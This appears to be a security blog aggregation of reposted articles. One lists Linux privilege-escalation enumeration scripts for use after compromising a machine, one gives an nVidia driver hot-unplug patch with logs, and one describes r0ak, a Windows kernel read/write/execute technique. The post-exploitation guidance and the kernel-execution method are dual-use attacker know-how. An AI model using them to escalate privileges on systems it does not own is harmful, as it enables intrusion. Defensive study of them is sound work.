  • 2018-09-17: iOS 12 released by Apple. The vulnerability was fixed.
  • 2018-09-24: macOS Mojave released by Apple. The vulnerability was fixed.
  • 2018-10-30: Vulnerabilities disclosed.

"Send it back"

Credits

  • «I am Error». Screenshot from Zelda II: The Adventure of Link. The screenshot copyright is believed to belong to Nintendo. Image downloaded from wikipedia.
  • «Send it back». By Edward Backhouse.

Linux Privilege Escalation via Automated Script

Картинки по запросу Linux Privilege Escalation

( Original text by Raj Chandel )

We all know that, after compromising the victim’s machine we have a low-privileges shell that we want to escalate into a higher-privileged shell and this process is known as Privilege Escalation. Today in this article we will discuss what comes under privilege escalation and how an attacker can identify that low-privileges shell can be escalated to higher-privileged shell. But apart from it, there are some scripts for Linux that may come in useful when trying to escalate privileges on a target system. This is generally aimed at enumeration rather than specific vulnerabilities/exploits. This type of script could save your much time.

Table of Content

  • Introduction
  • Vectors of Privilege Escalation
  • LinuEnum
  • Linuxprivchecker
  • Linux Exploit Suggester 2
  • Bashark
  • BeRoot

Introduction

Basically privilege escalation is a phase that comes after the attacker has compromised the victim’s machine where he try to gather critical information related to system such as hidden password and weak configured services or applications and etc. All these information helps the attacker to make the post exploit against machine for getting higher-privileged shell.

Vectors of Privilege Escalation

  • OS Detail & Kernel Version
  • Any Vulnerable package installed or running
  • Files and Folders with Full Control or Modify Access
  • File with SUID Permissions
  • Mapped Drives (NFS)
  • Potentially Interesting Files
  • Environment Variable Path
  • Network Information (interfaces, arp, netstat)
  • Running Processes
  • Cronjobs
  • User’s Sudo Right
  • Wildcard Injection

There are several script use in Penetration testing for quickly identify potential privilege escalation vectors on Windows systems and today we are going to elaborate each script which is working smoothly.

LinuEnum

Scripted Local Linux Enumeration & Privilege Escalation Checks Shellscript that enumerates the system configuration and high-level summary of the checks/tasks performed by LinEnum.

Privileged access: Diagnose if the current user has sudo access without a password; whether the root’s home directory accessible.

System Information: Hostname, Networking details, Current IP and etc.

User Information: Current user, List all users including uid/gid information, List root accounts, Checks if password hashes are stored in /etc/passwd.

Kernel and distribution release details.

You can download it through github with help of following command:

Once you download this script, you can simply run it by tying ./LinEnum.sh on terminal. Hence it will dump all fetched data and system details.

Let’s Analysis Its result what is brings to us:

OS & Kernel Info: 4.15.0-36-generic, Ubuntu-16.04.1

Hostname: Ubuntu

Moreover…..

Super User Accounts: root, demo, hack, raaz

Sudo Rights User: Ignite, raj

Home Directories File Permission

Environment Information

And many more such things which comes under the Post exploitation.

Linuxprivchecker

Enumerates the system configuration and runs some privilege escalation checks as well. It is a python implementation to suggest exploits particular to the system that’s been taken under. Use wget to download the script from its source URL.

Now to use this script just type python linuxprivchecke.py on terminal and this will enumerate file and directory permissions/contents. This script works same as LinEnum and hunts details related to system network and user.

Let’s Analysis Its result what is brings to us.

OS & Kernel Info: 4.15.0-36-generic, Ubuntu-16.04.1

Hostname: Ubuntu

Network Info: Interface, Netstat

Writable Directory and Files for Users other than Root: /home/raj/script/shell.py

Checks if Root’s home folder is accessible

File having SUID/SGID Permission

For example: /bin/raj/asroot.sh which is a bash script with SUID Permission

Linux Exploit Suggester 2

Next-generation exploit suggester based on Linux_Exploit_Suggester. This program performs a ‘uname -r‘ to grab the Linux operating system release version, and returns a list of possible exploits.

This script is extremely useful for quickly finding privilege escalation vulnerabilities both in on-site and exam environments.

Key Improvements Include:

  • More exploits
  • Accurate wildcard matching. This expands the scope of searchable exploits.
  • Output colorization for easy viewing.
  • And more to come

You can use the ‘-k’ flag to manually enter a wildcard for the kernel/operating system release version.

Bashark

Bashark aids pentesters and security researchers during the post-exploitation phase of security audits.

Its Features

  • Single Bash script
  • Lightweight and fast
  • Multi-platform: Unix, OSX, Solaris etc.
  • No external dependencies
  • Immune to heuristic and behavioural analysis
  • Built-in aliases of often used shell commands
  • Extends system shell with post-exploitation oriented functionalities
  • Stealthy, with custom cleanup routine activated on exit
  • Easily extensible (add new commands by creating Bash functions)
  • Full tab completion

Execute following command to download it from the github:

 

To execute the script you need to run following command:

The help command will let you know all available options provide by bashark for post exploitation.

With help of portscan option you can scan the internal network of the compromised machine.

To fetch all configuration file you can use getconf option. It will pull out all configuration file stored inside /etcdirectory. Similarly you can use getprem option to view all binaries files of the target‘s machine.

BeRoot

BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege. This tool does not realize any exploitation. It mains goal is not to realize a configuration assessment of the host (listing all services, all processes, all network connection, etc.) but to print only information that have been found as potential way to escalate our privilege.

 

To execute the script you need to run following command:

It will try to enumerate all possible loopholes which can lead to privilege Escalation, as you can observe the highlighted yellow color text represents weak configuration that can lead to root privilege escalation whereas the red color represent the technique that can be used to exploit.

It’s Functions:

Check Files Permissions

SUID bin

NFS root Squashing

Docker

Sudo rules

Kernel Exploit

Conclusion: Above executed script are available on github, you can easily download it from github. These all automated script try to identify the weak configuration that can lead to root privilege escalation.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Patching nVidia GPU driver for hot-unplug on Linux

( original text by @whitequark )

Recently, I’ve using an extremely cursed setup where my XPS 13 9360 laptop is connected to a Sonnet EchoExpress 2 box rewired for Thunderbolt 3 that has an nVidia Quadro 600 GPU, and Linux is set up for render offload to the eGPU and then frame transfer back to iGPU to be displayed on the laptop’s integrated display, which (to my sheer surprise) not only works quire reliably, but even gives me higher FPS in Team Fortress 2 than the iGPU.Картинки по запросу nvidiaThere’s only really one downside: if the eGPU falls off the bus, either because someone™ pulled out the cable, or because the stars didn’t align quite right this morning and it decided to enumerate seemingly at random (sometimes this is preceeded by whining from PCIe AER, sometimes not, I think it’s some sort of hardware issue like a badly inserted PCIe card, but I’m not entirely sure), the nVidia driver… hangs. Hangs quite deliberately, as the sources to the kernel driver show. This leaves the Xorg instance bound to the eGPU hung forever (which confuses bumblebee, but is otherwise not especially bad), and also prevents any new ones from using the eGPU (which is bad).

Anyway, I was kind of annoyed of rebooting every time it happens, so I decided to reboot a few more dozen times instead while patching the driver. This has indeed worked, and left me with something similar to a functional hot-unplug, mildly crippled by the fact that nvidia-modeset is a completely opaque blob that keeps some internal state and tries to act on it, getting stuck when it tries to do something to the now-missing eGPU.

Turns out, there are only a few issues preventing functional hot-unplug.

  1. In nvidia_remove, the driver actually checks if anyone’s still trying to use it, and if yes, it tries to just hang the removal process. This doesn’t actually work, or rather, it mostly works by accident. It starts an infinite loop calling os_schedule() while having taken the NV_LINUX_DEVICES lock. While in the default configuration this indeed hangs any reentrant requests into the driver by virtue of NV_CHECK_PCI_CONFIG_SPACE taking the same lock (in verify_pci_bars, passing the NVreg_CheckPCIConfigSpace=0 module option eliminates that accidental safety mechanism, and allows reentrant requests to proceed. They do not crash due to memory being deallocated in nvidia_remove (so you don’t get an unhandled kernel page fault), but they still crash due to being unable to access the GPU.
  2. The NVKMS component (in the nvidia-modeset module) tries to maintain some state, and change it when e.g. the Xorg instance quits and closes the /dev/nvidia-modeset file. Unfortunately, it does not expect the GPU to go away, and first spews a few messages to dmesg similar to nvidia-modeset: ERROR: GPU:0: Failed to query display engine channel state: 0x0000857d:0:0:0x0000000f, after which it appears to hang somewhere inside the blob, which has been conveniently stripped of all symbols. This needs to be prevented, but…
  3. The NVKMS component effectively only exposes a single opaque ioctl, and all the communication, including communication of the GPU bus ID, happens out of band with regards to the open source parts of the nvidia-modesetmodule. Fortunately, NVKMS calls back into NVRM, and this allows us to associate each /dev/nvidia-modeset fd with the GPU bus ID.
  4. When unloading NVKMS, it also tries to act on its internal state and change the GPU state, which leads to the same hang.

All in all, this allows a patch to be written that detects when a GPU goes away, ignores all further NVKMS requests related to that specific GPU (and returns -ENOENT in response to ioctls, which Xorg appropriately interprets as a fault condition), correctly releases the resources by requesting NVRM, and improperly unloads NVKMS so it doesn’t try to reset the GPU state. (All actual resources should be released by this point, and NVKMS doesn’t have any resource allocation callbacks other than those we already intercept, so in theory this doesn’t have any bad consequences. But I’m not working for nVidia, so this might be completely wrong.)

After the GPU is plugged back in, NVKMS will try to act on its internal state again; in this case, it doesn’t hang, but it doesn’t initialize the GPU correctly either, so the nvidia-modeset kernel module has to be (manually) reloaded. It’s not easy to do this automatically because in a hypothetical system with more than one nVidia GPU the module would still be in use when one of them dies, and so just hard reloading NVKMS would have unfortunate consequences. (Though, I don’t really know whether NVKMS would try to access the dead GPU in response to the request acting on the other GPU anyway. I decided to do it conservatively.) Once it’s reloaded you’re back in the game though!

Here’s the patch, written against the nvidia-legacy-390xx-390.87 Debian source package:

nvidia-hot-gpu-on-gpu-unplug-action.patch (download)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
diff -ur original/common/inc/nv-linux.h patchedl/common/inc/nv-linux.h
--- original/common/inc/nv-linux.h	2018-09-23 12:20:02.000000000 +0000
+++ patched/common/inc/nv-linux.h	2018-10-28 07:19:21.526566940 +0000
@@ -1465,6 +1465,7 @@
 typedef struct nv_linux_state_s {
     nv_state_t nv_state;
     atomic_t usage_count;
+    atomic_t dead;
 
     struct pci_dev *dev;
 
diff -ur original/common/inc/nv-modeset-interface.h patched/common/inc/nv-modeset-interface.h
--- original/common/inc/nv-modeset-interface.h	2018-08-22 00:55:23.000000000 +0000
+++ patched/common/inc/nv-modeset-interface.h	2018-10-28 07:22:00.768238371 +0000
@@ -25,6 +25,8 @@
 
 #include "nv-gpu-info.h"
 
+#include <asm/atomic.h>
+
 /*
  * nvidia_modeset_rm_ops_t::op gets assigned a function pointer from
  * core RM, which uses the calling convention of arguments on the
@@ -115,6 +117,8 @@
 
     int (*set_callbacks)(const nvidia_modeset_callbacks_t *cb);
 
+    atomic_t * (*gpu_dead)(NvU32 gpu_id);
+
 } nvidia_modeset_rm_ops_t;
 
 NV_STATUS nvidia_get_rm_ops(nvidia_modeset_rm_ops_t *rm_ops);
diff -ur original/common/inc/nv-proto.h patched/common/inc/nv-proto.h
--- original/common/inc/nv-proto.h	2018-08-22 00:55:23.000000000 +0000
+++ patched/common/inc/nv-proto.h	2018-10-28 07:20:49.939494812 +0000
@@ -81,6 +81,7 @@
 NvBool      nvidia_get_gpuid_list       (NvU32 *gpu_ids, NvU32 *gpu_count);
 int         nvidia_dev_get              (NvU32, nvidia_stack_t *);
 void        nvidia_dev_put              (NvU32, nvidia_stack_t *);
+atomic_t *  nvidia_dev_dead             (NvU32);
 int         nvidia_dev_get_uuid         (const NvU8 *, nvidia_stack_t *);
 void        nvidia_dev_put_uuid         (const NvU8 *, nvidia_stack_t *);
 int         nvidia_dev_get_pci_info     (const NvU8 *, struct pci_dev **, NvU64 *, NvU64 *);
diff -ur original/nvidia/nv.c patched/nvidia/nv.c
--- original/nvidia/nv.c	2018-09-23 12:20:02.000000000 +0000
+++ patched/nvidia/nv.c	2018-10-28 07:48:05.895025112 +0000
@@ -1944,6 +1944,12 @@
     unsigned int i;
     NvBool bRemove = NV_FALSE;
 
+    if (NV_ATOMIC_READ(nvl->dead))
+    {
+        nv_printf(NV_DBG_ERRORS, "NVRM: nvidia_close called on dead device by pid %d!\n",
+                  current->pid);
+    }
+
     NV_CHECK_PCI_CONFIG_SPACE(sp, nv, TRUE, TRUE, NV_MAY_SLEEP());
 
     /* for control device, just jump to its open routine */
@@ -2106,6 +2112,12 @@
     size_t arg_size;
     int arg_cmd;
 
+    if (NV_ATOMIC_READ(nvl->dead))
+    {
+        nv_printf(NV_DBG_ERRORS, "NVRM: nvidia_ioctl called on dead device by pid %d!\n",
+                  current->pid);
+    }
+
     nv_printf(NV_DBG_INFO, "NVRM: ioctl(0x%x, 0x%x, 0x%x)\n",
         _IOC_NR(cmd), (unsigned int) i_arg, _IOC_SIZE(cmd));
 
@@ -3217,6 +3229,7 @@
     NV_INIT_MUTEX(&nvl->ldata_lock);
 
     NV_ATOMIC_SET(nvl->usage_count, 0);
+    NV_ATOMIC_SET(nvl->dead, 0);
 
     if (!rm_init_event_locks(sp, nv))
         return NV_FALSE;
@@ -4018,14 +4031,38 @@
         nv_printf(NV_DBG_ERRORS,
                   "NVRM: Attempting to remove minor device %u with non-zero usage count!\n",
                   nvl->minor_num);
+        nv_printf(NV_DBG_ERRORS,
+                  "NVRM: YOLO, waiting for usage count to drop to zero\n");
         WARN_ON(1);
 
-        /* We can't continue without corrupting state, so just hang to give the
-         * user some chance to do something about this before reboot */
-        while (1)
+        NV_ATOMIC_SET(nvl->dead, 1);
+
+        /* Insanity check: wait until all clients die, then hope for the best. */
+        while (1) {
+            UNLOCK_NV_LINUX_DEVICES();
             os_schedule();
-    }
+            LOCK_NV_LINUX_DEVICES();
+
+            nvl = pci_get_drvdata(dev);
+            if (!nvl || (nvl->dev != dev))
+            {
+                goto done;
+            }
+
+            if (NV_ATOMIC_READ(nvl->usage_count) == 0)
+            {
+                break;
+            }
+        }
 
+        nv_printf(NV_DBG_ERRORS,
+                  "NVRM: Usage count is now zero, proceeding to remove the GPU\n");
+        nv_printf(NV_DBG_ERRORS,
+                  "NVRM: This is not actually supposed to work lol. Hope it does tho 👍\n");
+        nv_printf(NV_DBG_ERRORS,
+                  "NVRM: You probably want to reload nvidia-modeset now if you want any "
+                  "of this to ever start up again, but like, man, that's your choice entirely\n");
+    }
     nv = NV_STATE_PTR(nvl);
     if (nvl == nv_linux_devices)
         nv_linux_devices = nvl->next;
@@ -4712,6 +4749,22 @@
     up(&nvl->ldata_lock);
 }
 
+atomic_t *nvidia_dev_dead(NvU32 gpu_id)
+{
+    nv_linux_state_t *nvl;
+    atomic_t *ret;
+
+    /* Takes nvl->ldata_lock */
+    nvl = find_gpu_id(gpu_id);
+    if (!nvl)
+        return NV_FALSE;
+
+    ret = &nvl->dead;
+    up(&nvl->ldata_lock);
+
+    return ret;
+}
+
 /*
  * Like nvidia_dev_get but uses UUID instead of gpu_id. Note that this may
  * trigger initialization and teardown of unrelated devices to look up their
diff -ur original/nvidia/nv-modeset-interface.c patched/nvidia/nv-modeset-interface.c
--- original/nvidia/nv-modeset-interface.c	2018-08-22 00:55:22.000000000 +0000
+++ patched/nvidia/nv-modeset-interface.c	2018-10-28 07:20:25.959243110 +0000
@@ -114,6 +114,7 @@
         .close_gpu      = nvidia_dev_put,
         .op             = rm_kernel_rmapi_op, /* provided by nv-kernel.o */
         .set_callbacks  = nvidia_modeset_set_callbacks,
+        .gpu_dead       = nvidia_dev_dead,
     };
 
     if (strcmp(rm_ops->version_string, NV_VERSION_STRING) != 0)
diff -ur original/nvidia/nv-reg.h patched/nvidia/nv-reg.h
diff -ur original/nvidia-modeset/nvidia-modeset-linux.c patched/nvidia-modeset/nvidia-modeset-linux.c
--- original/nvidia-modeset/nvidia-modeset-linux.c	2018-09-23 12:20:02.000000000 +0000
+++ patched/nvidia-modeset/nvidia-modeset-linux.c	2018-10-28 07:47:14.738703417 +0000
@@ -75,6 +75,9 @@
 
 static struct semaphore nvkms_lock;
 
+static NvU32 clopen_gpu_id;
+static NvBool leak_on_unload;
+
 /*************************************************************************
  * NVKMS executes queued work items on a single kthread.
  *************************************************************************/
@@ -89,6 +92,9 @@
 struct nvkms_per_open {
     void *data;
 
+    NvU32 gpu_id;
+    atomic_t *gpu_dead;
+
     enum NvKmsClientType type;
 
     union {
@@ -711,6 +717,9 @@
     nvidia_modeset_stack_ptr stack = NULL;
     NvBool ret;
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "nvkms_open_gpu called with %08x, pid %d\n",
+           gpuId, current->pid);
+
     if (__rm_ops.alloc_stack(&stack) != 0) {
         return NV_FALSE;
     }
@@ -719,6 +728,10 @@
 
     __rm_ops.free_stack(stack);
 
+    if (ret) {
+        clopen_gpu_id = gpuId;
+    }
+
     return ret;
 }
 
@@ -726,12 +739,17 @@
 {
     nvidia_modeset_stack_ptr stack = NULL;
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "nvkms_close_gpu called with %08x, pid %d\n",
+           gpuId, current->pid);
+
     if (__rm_ops.alloc_stack(&stack) != 0) {
         return;
     }
 
     __rm_ops.close_gpu(gpuId, stack);
 
+    clopen_gpu_id = gpuId;
+
     __rm_ops.free_stack(stack);
 }
 
@@ -771,8 +789,14 @@
 
     popen->type = type;
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "entering nvkms_open_common, pid %d\n",
+           current->pid);
+
     *status = down_interruptible(&nvkms_lock);
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "taken lock in nvkms_open_common, pid %d\n",
+           current->pid);
+
     if (*status != 0) {
         goto failed;
     }
@@ -781,6 +805,9 @@
 
     up(&nvkms_lock);
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "given up lock in nvkms_open_common, pid %d\n",
+           current->pid);
+
     if (popen->data == NULL) {
         *status = -EPERM;
         goto failed;
@@ -799,10 +826,16 @@
 
     *status = 0;
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "exiting in nvkms_open_common, pid %d\n",
+           current->pid);
+
     return popen;
 
 failed:
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "error in nvkms_open_common, pid %d\n",
+           current->pid);
+
     nvkms_free(popen, sizeof(*popen));
 
     return NULL;
@@ -816,14 +849,36 @@
      * mutex.
      */
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "entering nvkms_close_common, pid %d\n",
+           current->pid);
+
     down(&nvkms_lock);
 
-    nvKmsClose(popen->data);
+    printk(KERN_INFO NVKMS_LOG_PREFIX "taken lock in nvkms_close_common, pid %d\n",
+           current->pid);
+
+    if (popen->gpu_id != 0 && atomic_read(popen->gpu_dead) != 0) {
+        printk(KERN_ERR NVKMS_LOG_PREFIX "awwww u need cleanup :3 "
+               "in nvkms_close_common, pid %d\n",
+               current->pid);
+
+        nvkms_close_gpu(popen->gpu_id);
+
+        popen->gpu_id = 0;
+        popen->gpu_dead = NULL;
+
+        leak_on_unload = NV_TRUE;
+    } else {
+        nvKmsClose(popen->data);
+    }
 
     popen->data = NULL;
 
     up(&nvkms_lock);
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "given up lock in nvkms_close_common, pid %d\n",
+           current->pid);
+
     if (popen->type == NVKMS_CLIENT_KERNEL_SPACE) {
         /*
          * Flush any outstanding nvkms_kapi_event_kthread_q_callback() work
@@ -844,6 +899,9 @@
     }
 
     nvkms_free(popen, sizeof(*popen));
+
+    printk(KERN_INFO NVKMS_LOG_PREFIX "exiting nvkms_close_common, pid %d\n",
+           current->pid);
 }
 
 int NVKMS_API_CALL nvkms_ioctl_common
@@ -855,20 +913,58 @@
     int status;
     NvBool ret;
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "entering nvkms_ioctl_common, pid %d\n",
+           current->pid);
+
     status = down_interruptible(&nvkms_lock);
     if (status != 0) {
         return status;
     }
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "taken lock in nvkms_ioctl_common, pid %d\n",
+           current->pid);
+
+    if (popen->gpu_id != 0 && atomic_read(popen->gpu_dead) != 0) {
+        goto dead;
+    }
+
+    clopen_gpu_id = 0;
+
     if (popen->data != NULL) {
         ret = nvKmsIoctl(popen->data, cmd, address, size);
     } else {
         ret = NV_FALSE;
     }
 
+    if (clopen_gpu_id != 0) {
+        if (!popen->gpu_id) {
+            printk(KERN_INFO NVKMS_LOG_PREFIX "detected gpu %08x open in nvkms_ioctl_common, "
+                   "pid %d\n", clopen_gpu_id, current->pid);
+            popen->gpu_id = clopen_gpu_id;
+            popen->gpu_dead = __rm_ops.gpu_dead(clopen_gpu_id);
+        } else {
+            printk(KERN_INFO NVKMS_LOG_PREFIX "detected gpu %08x close in nvkms_ioctl_common, "
+                   "pid %d\n", clopen_gpu_id, current->pid);
+            popen->gpu_id = 0;
+            popen->gpu_dead = NULL;
+        }
+    }
+
     up(&nvkms_lock);
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "given up lock in nvkms_ioctl_common, pid %d\n",
+           current->pid);
+
     return ret ? 0 : -EPERM;
+
+dead:
+    up(&nvkms_lock);
+
+    printk(KERN_ERR NVKMS_LOG_PREFIX "*notices ur gpu is dead* owo whats this "
+           "in nvkms_ioctl_common, pid %d\n",
+           current->pid);
+
+    return -ENOENT;
 }
 
 /*************************************************************************
@@ -1239,9 +1335,14 @@
 
     nvkms_proc_exit();
 
-    down(&nvkms_lock);
-    nvKmsModuleUnload();
-    up(&nvkms_lock);
+    if(leak_on_unload) {
+        printk(KERN_ERR NVKMS_LOG_PREFIX "im just gonna leak all the kms junk ok? "
+               "haha nvm wasnt a question. in nvkms_exit\n");
+    } else {
+        down(&nvkms_lock);
+        nvKmsModuleUnload();
+        up(&nvkms_lock);
+    }
 
     /*
      * At this point, any pending tasks should be marked canceled, but

Here’s some handy scripts I was using while debugging it:

insmod.sh
1
2
3
4
5
#!/bin/sh -ex
modprobe acpi_ipmi
insmod nvidia.ko NVreg_ResmanDebugLevel=-1 NVreg_CheckPCIConfigSpace=0
insmod nvidia-modeset.ko
dmesg -w
rmmod.sh
1
2
3
#!/bin/sh
rmmod nvidia-modeset
rmmod nvidia
xorg.sh
1
2
#!/bin/sh
exec Xorg :8 -config /etc/bumblebee/xorg.conf.nvidia -configdir /etc/bumblebee/xorg.conf.d -sharevts -nolisten tcp -noreset -verbose 3 -isolateDevice PCI:06:00:0 -modulepath /usr/lib/nvidia/nvidia,/usr/lib/xorg/modules

And finally, here are the relevant kernel and Xorg log messages, showing what happens when a GPU is unplugged:

dmesg.log
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
[  219.524218] NVRM: loading NVIDIA UNIX x86_64 Kernel Module  390.87  Tue Aug 21 12:33:05 PDT 2018 (using threaded interrupts)
[  219.527409] nvidia-modeset: Loading NVIDIA Kernel Mode Setting Driver for UNIX platforms  390.87  Tue Aug 21 16:16:14 PDT 2018
[  224.780721] nvidia-modeset: nvkms_open_gpu called with 00000600, pid 4560
[  224.807370] nvidia-modeset: detected gpu 00000600 open in nvkms_ioctl_common, pid 4560
[  239.061383] NVRM: GPU at PCI:0000:06:00: GPU-9fe1319c-8dd3-44e4-2b74-de93f8b02c6a
[  239.061387] NVRM: Xid (PCI:0000:06:00): 79, GPU has fallen off the bus.
[  239.061389] NVRM: GPU at 0000:06:00.0 has fallen off the bus.
[  239.061398] NVRM: A GPU crash dump has been created. If possible, please run
               NVRM: nvidia-bug-report.sh as root to collect this data before
               NVRM: the NVIDIA kernel module is unloaded.
[  240.209498] NVRM: Attempting to remove minor device 0 with non-zero usage count!
[  240.209501] NVRM: YOLO, waiting for usage count to drop to zero
[  241.433499] nvidia-modeset: *notices ur gpu is dead* owo whats this in nvkms_ioctl_common, pid 4560
[  241.433851] nvidia-modeset: awwww u need cleanup :3 in nvkms_close_common, pid 4560
[  241.433853] nvidia-modeset: nvkms_close_gpu called with 00000600, pid 4560
[  250.440498] NVRM: Usage count is now zero, proceeding to remove the GPU
[  250.440513] NVRM: This is not actually supposed to work lol. Hope it does tho 👍
[  250.440520] NVRM: You probably want to reload nvidia-modeset now if you want any of this to ever start up again, but like, man, that's your choice entirely
[  250.440870] pci 0000:06:00.1: Dropping the link to 0000:06:00.0
[  250.440950] pci_bus 0000:06: busn_res: [bus 06] is released
[  250.440982] pci_bus 0000:07: busn_res: [bus 07-38] is released
[  250.441012] pci_bus 0000:05: busn_res: [bus 05-38] is released
[  251.000794] pci_bus 0000:02: Allocating resources
[  251.001324] pci_bus 0000:02: Allocating resources
[  253.765953] pcieport 0000:00:1c.0: AER: Corrected error received: 0000:00:1c.0
[  253.765969] pcieport 0000:00:1c.0: PCIe Bus Error: severity=Corrected, type=Physical Layer, (Receiver ID)
[  253.765976] pcieport 0000:00:1c.0:   device [8086:9d10] error status/mask=00002001/00002000
[  253.765982] pcieport 0000:00:1c.0:    [ 0] Receiver Error         (First)
[  253.841064] pcieport 0000:02:02.0: Refused to change power state, currently in D3
[  253.843882] pcieport 0000:02:00.0: Refused to change power state, currently in D3
[  253.846177] pci_bus 0000:03: busn_res: [bus 03] is released
[  253.846248] pci_bus 0000:04: busn_res: [bus 04-38] is released
[  253.846300] pci_bus 0000:39: busn_res: [bus 39] is released
[  253.846348] pci_bus 0000:02: busn_res: [bus 02-39] is released
[  353.369487] nvidia-modeset: im just gonna leak all the kms junk ok? haha nvm wasnt a question. in nvkms_exit
[  357.600350] nvidia-modeset: Loading NVIDIA Kernel Mode Setting Driver for UNIX platforms  390.87  Tue Aug 21 16:16:14 PDT 2018
Xorg.8.log
1
[   244.798] (EE) NVIDIA(GPU-0): WAIT (2, 8, 0x8000, 0x000011f4, 0x00001210)

R0Ak (The Ring 0 Army Knife) — A Command Line Utility To Read/Write/Execute Ring Zero On For Windows 10 Systems

r0ak is a Windows command-line utility that enables you to easily read, write, and execute kernel-mode code (with some limitations) from the command prompt, without requiring anything else other than Administrator privileges.

Quick Peek

r0ak v1.0.0 -- Ring 0 Army Knife
http://www.github.com/ionescu007/r0ak
Copyright (c) 2018 Alex Ionescu [@aionescu]
http://www.windows-internals.com

USAGE: r0ak.exe
       [--execute <Address | module.ext!function> <Argument>]
       [--write   <Address | module.ext!function> <Value>]
       [--read    <Address | module.ext!function> <Size>]

Introduction

Motivation
The Windows kernel is a rich environment in which hundreds of drivers execute on a typical system, and where thousands of variables containing global state are present. For advanced troubleshooting, IT experts will typically use tools such as the Windows Debugger (WinDbg), SysInternals Tools, or write their own. Unfortunately, usage of these tools is getting increasingly hard, and they are themselves limited by their own access to Windows APIs and exposed features.
Some of today’s challenges include:

  • Windows 8 and later support Secure Boot, which prevents kernel debugging (including local debugging) and loading of test-signed driver code. This restricts troubleshooting tools to those that have a signed kernel-mode driver.
  • Even on systems without Secure Boot enabled, enabling local debugging or changing boot options which ease debugging capabilities will often trigger BitLocker’s recovery mode.
  • Windows 10 Anniversary Update and later include much stricter driver signature requirements, which now enforce Microsoft EV Attestation Signing. This restricts the freedom of software developers as generic «read-write-everything» drivers are frowned upon.
  • Windows 10 Spring Update now includes customer-facing options for enabling HyperVisor Code Integrity (HVCI) which further restricts allowable drivers and blacklists multiple 3rd party drivers that had «read-write-everything» capabilities due to poorly written interfaces and security risks.
  • Technologies like Supervisor Mode Execution Prevention (SMEP), Kernel Control Flow Guard (KCFG) and HVCI with Second Level Address Translation (SLAT) are making traditional Ring 0 execution ‘tricks’ obsoleted, so a new approach is needed.

In such an environment, it was clear that a simple tool which can be used as an emergency band-aid/hotfix and to quickly troubleshoot kernel/system-level issues which may be apparent by analyzing kernel state might be valuable for the community.

How it Works

Basic Architecture

r0ak works by redirecting the execution flow of the window manager’s trusted font validation checks when attempting to load a new font, by replacing the trusted font table’s comparator routine with an alternate function which schedules an executive work item (WORK_QUEUE_ITEM) stored in the input node. Then, the trusted font table’s right child (which serves as the root node) is overwritten with a named pipe’s write buffer (NP_DATA_ENTRY) in which a custom work item is stored. This item’s underlying worker function and its parameter are what will eventually be executed by a dedicated ExpWorkerThread at PASSIVE_LEVELonce a font load is attempted and the comparator routine executes, receiving the name pipe-backed parent node as its input. A real-time Event Tracing for Windows (ETW) trace event is used to receive an asynchronous notification that the work item has finished executing, which makes it safe to tear down the structures, free the kernel-mode buffers, and restore normal operation.

Supported Commands
When using the --execute option, this function and parameter are supplied by the user.
When using --write, a custom gadget is used to modify arbitrary 32-bit values anywhere in kernel memory.
When using --read, the write gadget is used to modify the system’s HSTI buffer pointer and size (N.B.: This is destructive behavior in terms of any other applications that will request the HSTI data. As this is optional Windows behavior, and this tool is meant for emergency debugging/experimentation, this loss of data was considered acceptable). Then, the HSTI Query API is used to copy back into the tool’s user-mode address space, and a hex dump is shown.
Because only built-in, Microsoft-signed, Windows functionality is used, and all called functions are part of the KCFG bitmap, there is no violation of any security checks, and no debugging flags are required, or usage of 3rd party poorly-written drivers.

FAQ

Is this a bug/vulnerability in Windows?
No. Since this tool — and the underlying technique — require a SYSTEM-level privileged token, which can only be obtained by a user running under the Administrator account, no security boundaries are being bypassed in order to achieve the effect. The behavior and utility of the tool is only possible due to the elevated/privileged security context of the Administrator account on Windows, and is understood to be a by-design behavior.

Was Microsoft notified about this behavior?
Of course! It’s important to always file security issues with Microsoft even when no violation of privileged boundaries seems to have occurred — their teams of researchers and developers might find novel vectors and ways to reach certain code paths which an external researcher may not have thought of.
